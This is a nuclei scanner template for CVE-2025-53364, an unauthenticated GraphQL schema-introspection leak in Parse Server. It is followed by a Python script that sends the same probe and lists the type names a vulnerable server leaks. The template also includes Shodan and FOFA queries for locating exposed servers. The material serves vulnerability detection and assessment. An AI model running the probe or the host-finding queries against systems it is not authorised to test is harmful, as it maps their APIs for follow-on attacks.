id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.
  impact: |
    Unauthenticated attackers can retrieve GraphQL schema metadata (type, query and mutation names), which maps the API structure and query capabilities and expands the attack surface for further attacks.
  remediation: |
    Upgrade Parse Server to a version that requires authentication for GraphQL schema introspection.
  reference:
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://www.miggo.io/vulnerability-database/cve/CVE-2025-53364
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
    shodan-query:
      - http.title:"parse server" || "parse-server"
      - http.title:"parse dashboard"
    fofa-query: title="parse dashboard"
  tags: cve,cve2025,parse,graphql,exposure,vuln,vkev

variables:
  appid: "{{appid}}"

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Parse-Application-Id: {{appid}}

        {"query":"{\n __schema {\n types {\n name\n }\n }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data":{"__schema":{"types":[{"name":"Upload"},'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402202e66fd1e90e8b2fd24840e3561605488bd80c7adb7d2c1ae6a7d4a62255a2ed4022007774c9c5716f3c2bdd43748669e2b36261219159ecd2ef03ab03929fb0cfd99:922c64590222798bb761d5b6d8e72950
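The template above sends one unauthenticated `__schema` introspection query with only the `X-Parse-Application-Id` header and fingerprints the reply on an exact JSON prefix. The Python script below is an added example, not part of the nuclei template or of the Parse Server project: it builds the same request, parses the reply as JSON instead of matching a prefix (so type ordering does not matter), and lists the non-built-in type names an attacker learns from a leaked schema. The sample responses, the `example.com` host, the `myapp` application id and the `Unauthorized` error message are constructed for illustration and are not copied from a real Parse Server.

```python
"""Check whether a Parse Server /graphql endpoint answers schema introspection
without a session token or master key (CVE-2025-53364).  Example code; the
sample responses below are constructed, not captured from a real server."""
from __future__ import annotations

import json
from typing import Optional

# Same query the nuclei template sends.
INTROSPECTION_QUERY = "{\n __schema {\n types {\n name\n }\n }\n}"

# Names every GraphQL schema carries; everything else is app- or Parse-specific.
GRAPHQL_BUILTINS = {"String", "Int", "Float", "Boolean", "ID",
                    "Query", "Mutation", "Subscription"}


def build_request(host: str, app_id: str, session_token: Optional[str] = None) -> dict:
    """URL, headers and body for the introspection probe. Parse's GraphQL endpoint
    needs the application id header; a session token is optional so the same
    helper can be used to confirm that authenticated introspection still works."""
    headers = {"Content-Type": "application/json", "X-Parse-Application-Id": app_id}
    if session_token:
        headers["X-Parse-Session-Token"] = session_token
    return {"url": f"https://{host}/graphql", "headers": headers,
            "body": json.dumps({"query": INTROSPECTION_QUERY})}


def schema_type_names(body: str) -> list[str]:
    """Type names from a GraphQL introspection response, or [] if the server
    returned errors, no data, or something that is not JSON."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(doc, dict):
        return []
    schema = (doc.get("data") or {}).get("__schema") or {}
    return [t["name"] for t in schema.get("types") or [] if isinstance(t, dict) and "name" in t]


def non_builtin_type_names(body: str) -> list[str]:
    """What the leak actually tells an attacker: Parse-generated and app-defined
    types, with GraphQL's own scalars, root types and __-prefixed meta types removed."""
    return [n for n in schema_type_names(body)
            if n not in GRAPHQL_BUILTINS and not n.startswith("__")]


def is_exposed(status: int, content_type: str, body: str) -> bool:
    """The template's three matchers (200, JSON, schema with the Parse 'Upload'
    type), but evaluated on parsed JSON rather than a fixed byte prefix."""
    if status != 200 or "application/json" not in content_type:
        return False
    names = schema_type_names(body)
    return bool(names) and "Upload" in names


def check_live(host: str, app_id: str, timeout: float = 10.0) -> bool:
    """Send the probe over HTTPS with the standard library and classify the reply."""
    import urllib.error
    import urllib.request
    req = build_request(host, app_id)
    http_req = urllib.request.Request(req["url"], data=req["body"].encode(),
                                      headers=req["headers"], method="POST")
    try:
        with urllib.request.urlopen(http_req, timeout=timeout) as resp:
            return is_exposed(resp.status, resp.headers.get("Content-Type", ""),
                              resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a body
        return is_exposed(err.code, err.headers.get("Content-Type", ""),
                          err.read().decode("utf-8", "replace"))


# Constructed sample replies: the first mimics a server that answers introspection
# anonymously, the second a server that refuses it (error text is illustrative).
VULNERABLE_RESPONSE = ('{"data":{"__schema":{"types":[{"name":"Upload"},{"name":"Boolean"},'
                       '{"name":"String"},{"name":"__Schema"},{"name":"Query"},'
                       '{"name":"Mutation"},{"name":"Invoice"}]}}}')
PATCHED_RESPONSE = '{"errors":[{"message":"Unauthorized"}]}'


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print("exposed" if check_live(sys.argv[1], sys.argv[2]) else "not exposed")
    else:
        print("sample vulnerable reply leaks:", non_builtin_type_names(VULNERABLE_RESPONSE))
        print("sample patched reply leaks:", non_builtin_type_names(PATCHED_RESPONSE))
```

Run it as `python3 check.py <host> <application-id>` against a host you are authorised to test; without arguments it classifies the two constructed replies. The JSON-based check avoids a false negative the prefix matcher would produce if `Upload` were not the first type in the list, and `non_builtin_type_names` shows why "metadata only" still matters: the app's own class names (here the constructed `Invoice`) are exactly what an attacker needs to craft targeted queries next.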